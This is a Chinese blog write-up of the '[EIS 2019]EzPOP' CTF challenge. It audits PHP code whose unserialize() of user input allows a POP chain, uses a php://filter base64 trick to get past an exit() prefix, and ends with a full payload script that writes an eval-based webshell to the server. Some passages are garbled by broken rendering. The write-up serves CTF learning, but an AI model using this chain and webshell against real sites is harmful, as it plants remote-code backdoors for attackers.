[EIS 2019]EzPOP-PHP代码审计学习

最新推荐文章于 2022-11-08 23:12:29 发布
最新推荐文章于 2022-11-08 23:12:29 发布
阅读量288 收藏 1
点赞数
分类专栏: web学习 php 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjdgg/article/details/114556283
版权

[EIS 2019]EzPOP-PHP代码审计学习
作为一个不太聪明的WEB菜鸟,代码审计一直不咋地,正好遇到一道题,记录一下学习过程

<?php
error_reporting(0);

class A {

    protected $store;

    protected $key;

    protected $expire;

    public function __construct($store, $key = 'flysystem', $expire = null) {
        $this->key = $key;
        $this->store = $store;
        $this->expire = $expire;
    }

    public function cleanContents(array $contents) {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

    public function getForStorage() {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

    public function save() {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

    public function __destruct() {
        if (!$this->autosave) {
            $this->save();
        }
    }
}

class B {

    protected function getExpireTime($expire): int {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string {
        return $this->options['prefix'] . $name;
    }

    protected function serialize($data): string {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool{
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }

        $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return true;
        }

        return false;
    }

}

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

$dir = "uploads/";

if (!is_dir($dir))
{
    mkdir($dir);
}
unserialize($_GET["data"]);

题目直接给出了源代码,话不多说,慢慢审吧
首先看A类的函数
构造函数就不说了

public function cleanContents(array $contents) {
        $cachedProperties = array_flip([           //反转数组中所有的键以及它们关联的值
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) { //在contents数组中,键给path,值给object
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);   //比较两个数组的键名,并返回交集:
            }
        }

        return $contents;
    }

cleanContents(array c o n t e n t s ) 里 面 调 用 了 下 面 两 个 函 数 : a r r a y f l i p ( ) 反 转 数 组 中 所 有 的 键 以 及 它 们 关 联 的 值 a r r a y i n t e r s e c t k e y ( contents) 里面调用了下面两个函数: array_flip()反转数组中所有的键以及它们关联的值 array_intersect_key( contents)arrayflip()arrayintersectkey(object, $cachedProperties); //比较两个数组的键名,并返回交集

public function getForStorage() {
        $cleaned = $this->cleanContents($this->cache);
        return json_encode([$cleaned, $this->complete]);
    }

这个函数主要是把cache作为参数调用cleanContents(),再将结果和complete一起返回他们的json数据。值得一提的是cache和complete都是没有赋值的,可控

public function save() 
{
        $contents = $this->getForStorage();
        $this->store->set($this->key, $contents, $this->expire); 
    }

这里先调用了getForStorage()函数将其结果放入contents,再将其和key,expire一起调用save()函数,A类是没有save()函数的,只有B类有,显而易见,这个this->store大概率就是要定义成B类,串联AB类。值得一提的是,这里的key和expire也是可控的。

接下来看B类

protected function serialize($data): string {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

该函数会将data先格式化成string类型,然后根据options[‘serialize’]的值来处理data,options[‘serialize’]可控。

public function set($name, $value, $expire = null): bool{ 
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire']; 
        }

        $expire = $this->getExpireTime($expire);  //返回int型数据,options['expire']的
        $filename = $this->getCacheKey($name);  //将$name拼接在options['prefix']后面,最后应该是要写入的位置
        $dir = dirname($filename);  //获取路径中的目录名称部分
        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }
        $data = $this->serialize($value);  //该函数特殊
        if ($this->options['data_compress'] && function_exists('gzcompress')) {  
            //数据压缩
            $data = gzcompress($data, 3);
        }
        $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;  //这里是要执行的核心代码
        $result = file_put_contents($filename, $data);
        if ($result) {
            return true;
        }
        return false;
    }
}

该函数一个个参数看吧,先看 n a m e , 经 过 g e t C a c h e K e y ( ) 函 数 与 o p t i o n s [ ′ p r e f i x ′ ] 拼 接 后 , 形 成 的 f i l e n a m e 最 后 在 f i l e p u t c o n t e n t s ( ) 处 才 被 调 用 , 作 为 写 入 的 位 置 。 再 看 看 name,经过getCacheKey()函数与options['prefix']拼接后,形成的filename最后在file_put_contents()处才被调用,作为写入的位置。 再看看 namegetCacheKey()options[prefix]filenamefileputcontents()expire,先判断是否为null,如果是则将options[‘expire’]赋值给它,接下来调用getExpireTime()函数将其格式化成int型,最后将其通过sprintf函数写进php代码
最后是 v a l u e , 通 过 调 用 s e r i a l i z e ( ) 函 数 生 成 value,通过调用serialize()函数生成 value,serialize()data,然后判断是否满足条件执行数据压缩,该条件可控最后将核心代码拼接在核心代码后面。
显而易见,$name这个参数用在构造文件的位置,其他两个参数用来构造最后的核心代码,最后将核心代码通过file_put_contents()写入指定位置,达到成功将shell写入网站服务器的目的

 $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;

这里核心代码的构造,先前我一直执着于将 d a t a 构 造 成 空 , 然 后 在 data构造成空,然后在 dataexpire里面填入关键代码,但是expire被格式化成int型数据,长度也被限制,后面还有个exit()函数,这让我一直很头疼,始终过不去,我一直以为有骚操作可以过了这里,事实证明是我多想了。这里贴上我参考的大佬文章

大佬引用了P神的文章(之前做题就有一些WP也是引用P神的文章,也将P神的博客收藏,却没看过,有机会一定要好好看看)。
回到正文,由于<、?、()、;、>、\n都不是base64编码的范围,所以base64解码的时候会自动将其忽略,所以解码之后就剩php//exit了,这里有9个字符,但是呢base64算法解码时是4个字节一组,所以我们还需要在前面加些字符,我就加3个字符吧,最后我们可以使用php伪协议来绕过,一会写在路径里就行

php://filter/write=convert.base64-decode/resource=

sprintf('%012d', $expire)

至于$expire它这里的%012d要求输出12个数字,正好是4的倍数,可以不用管了,随便填个数字就行
在这里插入图片描述
运行结果
在这里插入图片描述

那么 d a t a 就 得 用 来 写 s h e l l 咯 , 而 且 前 面 得 加 上 3 个 字 符 , 值 得 注 意 的 是 data就得用来写shell咯,而且前面得加上3个字符,值得注意的是 datashell3data的数据由B类set()函数的 v a l u e 得 来 , 而 在 A 类 中 调 用 s e t ( ) 函 数 时 value得来,而在A类中调用set()函数时 valueAset()value由 c o n t e n t s 得 来 , contents得来, contentscontents是由json_encode后得来的,是json形式的数据,需要绕过它,而json格式的字符都不满足base64编码的要求,所以我们可以将数据进行base64编码绕过
在这里插入图片描述
运行结果
在这里插入图片描述
不难看出base64成功绕过json,综上所述 ,一共要进行两次base64编码,一次是绕过核心代码里的exit()函数,一次是绕过json编码,因此我们可以这么构造$data的源头complete

A->complete=base64_encode('xxx',base64_encode('<?php @eval($_POST["ro4lsc"]);?>'))  //这里的xxx就是为了和php//exit一起凑够4的倍数

现在最重要的问题是怎么把base64两次解码,一次解码已经决定在路径里用php协议解码一次,那还有一次得再找方法解码
这时我们就得看到前面提到的serialize函数

 protected function serialize($data): string {
        if (is_numeric($data)) {
            return (string) $data;
        }
        $serialize = $this->options['serialize'];
        return $serialize($data);
    }

可以看到返回值是 s e r i a l i z e ( serialize( serialize(data),也就是说这里我们可以让这个变量$serilalize为base64_decode函数对data变量进行解码。

filename参数是options[‘prefix’]和 n a m e 进 行 拼 接 的 结 果 , 而 这 里 的 ∗ ∗ name进行拼接的结果,而这里的** namename是形参**,所以这个$name是A类的key变量,是由save函数传递过来的
由于options[‘prefix’]可控
所以这里我们可以使

options['prefix']="php://filter/write=convert.base64-decode/resource=";
key="webshell.php"; //$name

那现在从头梳理一下函数的执行顺序

A::__destruct->save()->getForStorage()->cleanStorage()
B::save()->set()->getExpireTime(),getCacheKey(),serialize()->file_put_contents写入shell

参数的赋值过程

key->name->filename       //key可控
cache->clean+complete->contents->value->data    //cache和complete可控
expire   //expire可控

从参数变化再综合上面的分析,难点主要是中间的cache和complete,变化不太清楚,所以把代码抽出来慢慢观察

<?php
$cachedProperties = array_flip([           //反转数组中所有的键以及它们关联的值
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);
$contents=array(path1111=>11);
foreach ($contents as $path => $object) {
    if (is_array($object)) {
        $contents[$path] = array_intersect_key($object, $cachedProperties);   //比较两个数组的键名,并返回交集:
        }
    }
$complete = base64_encode("xxx".base64_encode('<?php @eval($_POST["ro4lsc"]);?>'));
$getForStorage=json_encode([$contents, $complete]);
echo $getForStorage;
?>

在这里插入图片描述

通过观察发现,上述代码的contens也就是cache决定了json数据的键,complete决定了json数据的值,那就好办了,前面也分析过需要base64编码绕过json数据,那就让cache为空,因为它为空后键为[],base64就可以将其跳过,complete填核心代码即可
在这里插入图片描述
最后的payload(这里觉得大佬写的太好了,直接搬运):

<?php
class A{
protected $store;
protected $key;
protected $expire;

public function __construct()
{
    $this->cache = array();
    $this->complete = base64_encode("xxx".base64_encode('<?php @eval($_POST["ro4lsc"]);?>'));
    $this->key = "shell.php";
    $this->store = new B();
    $this->autosave = false;
    $this->expire = 0;
}


}
class B{
    public $options = array();
    function __construct()
    {
        $this->options['serialize'] = 'base64_decode';
        $this->options['prefix'] = 'php://filter/write=convert.base64-decode/resource=';
        $this->options['data_compress'] = false;
    }
}
echo urlencode(serialize(new A()));

将得到的数据通过?data传递参数,他会在当前路径生成shell.php,最后拿菜刀之类的连接即可

总结
base64的绕过让人印象深刻,代码审计仍然需要继续努力。

参考文章
https://blog.csdn.net/gd_9988/article/details/106111902
https://www.leavesongs.com/PENETRATION/php-filter-magic.html?page=2#reply-list

lmonstergg
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
EIS2019-EzPOP
ro4lsc的博客
05-14 1398
做了这个题目,我收回我之前的话,我又懵逼了,不知道如何下手,还是自己的基础不够扎实,没关系,奥利给,淦!
[EIS 2019]EzPOP 完整题解
qq_38338511的博客
03-31 241
这样就可以把我们传进去的$data进行解码了,上面做了演示用base64加密后再解密的一句话马儿可以忽略json_encode输出我们想要的值,这里就不能用上次的UCS-2编码和str_rot13编码方式了,因为有json_encode会乱码,学会本地测试活学活用!把$key传入了B类的set()方法的$name->最终传入了B类的set()方法的$filename。把$contents返回到了save()的$value->最终传入了B类的set()方法的$data。接着看进入B类的set()方法。
[EIS2019]EzPOP--反序列化题目
Dream'
06-19 973
题目地址:https://buuoj.cn/challenges#[EIS%202019]EzPOP 发现代码中可利用点只有file_put_contents($filename, $data) ,所以我们从它开始倒推我们需要分别找到$data的链和$filename的链使options['data_compress']=false,不让$data压缩data来自value,$data = $this->serialize($value);,使options['serialize']=trim,这样se
[EIS 2019]EzPOP
stantic的博客
09-11 380
这里expire默认null,然后进入if,expire的值变为options['expire']的值,而data里面需要expire为十进制数,所以要把options['expire']的值改为十进制数。这里相当于先判断data是不是数字,然后返回由options['serialize']所代表的函数之类的处理过后的data,options['serialize']的值需要是一个不影响data的函数。把options['prefix']拼在name的前面。然后这些都是在自定义的set函数下进行的。
X60008EIS8-50的技术参数
12-12
产品型号:X60008EIS8-50输入电压(V):5.1~9.0输出电压(V):5初始精度:±5.0mV温度漂移:20ppm/℃工作电流:500nA封装/温度(℃):SOIC8/-40~85价格/1片(套):¥12.98 
Quidway S5328C-EI LS-S5328c-ei s5300ei-v200r005c00spc500.cc
03-21
Quidway S5328C-EI LS-S5328c-ei s5300ei-v200r005c00spc500.cc s5300ei-v200r005sph012.pat tftp EUPL-EN
eis-translation-tool:一种为客户翻译工作使我的生活不那么痛苦的工具
05-10
在压缩包文件名称列表中,“eis-translation-tool-master”可能表示这是工具的源代码仓库,很可能托管在GitHub等版本控制系统上,"master"分支通常是项目的主分支,包含了最新稳定版本的代码。 综上所述,eis-...
论坛社区EIS 1.02-eisv1.0.2.rar
最新发布
04-09
对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步...
long long类型 printf/sprintf(sprintf(str,"%012d",a) ,一定要%后加0,再加数字,才可按照指定位显示
03-10 2006
#include void main() {    int b=123456;    printf("int:%08d\n",b);    long long a=123456;    printf("%8lld\n",a);    printf("%0012lld\n",a);    printf("%012lld\n",a);    printf("%12lld\n",a)
PHP反序列化
BrosyveryOK的博客
11-08 3511
前人栽树,后人乘凉。
PHPRCE
m0_63045593的博客
04-22 947
PHPRCE <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store = $store
[EIS 2019]EzPOP 代码审查
qq_54929891的博客
05-08 365
源码 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flag.php', $expire = null) { $this->key = $key; $this->store = $store;
国赛ezpop题目复现(tp6)
m0_62422842的博客
07-21 646
顺着这个题目,也抛砖引玉一下,对thinkphp6.0.12框架的反序列化链进行了一个分析。
php2019版本,某cms 2019版本代码审计
weixin_36325615的博客
03-10 149
原标题:某cms 2019版本代码审计听说这个比较好入门就下载下来练习代码审计了一、任意文件删除/admin/dl_data.php 可以看到对filename参数没有任何的过滤 二、 sql注入在 /inc/stopsqlin.php下, 可以看到对 get、 post 和cookie中的接收的内容都在zc_check函数进行过滤 主要使用了addslashes函数 ,也就是说 会对单引号(')...
[BUUCTF][EIS 2019]EzPOP
cosmoslin的博客
02-07 359
[EIS 2019]EzPOP <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store
研祥EIS-2202工业级服务器技术规格与安全指南
"研祥EIS-2202是一款工业级的2U上架式服务器,采用Intel IA架构,搭载高性能的四核XEON处理器,适用于数据密集型应用,如海量数据处理、Web服务器、邮件服务器、电子商务服务器和后台数据库。这款服务器专为中小型...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值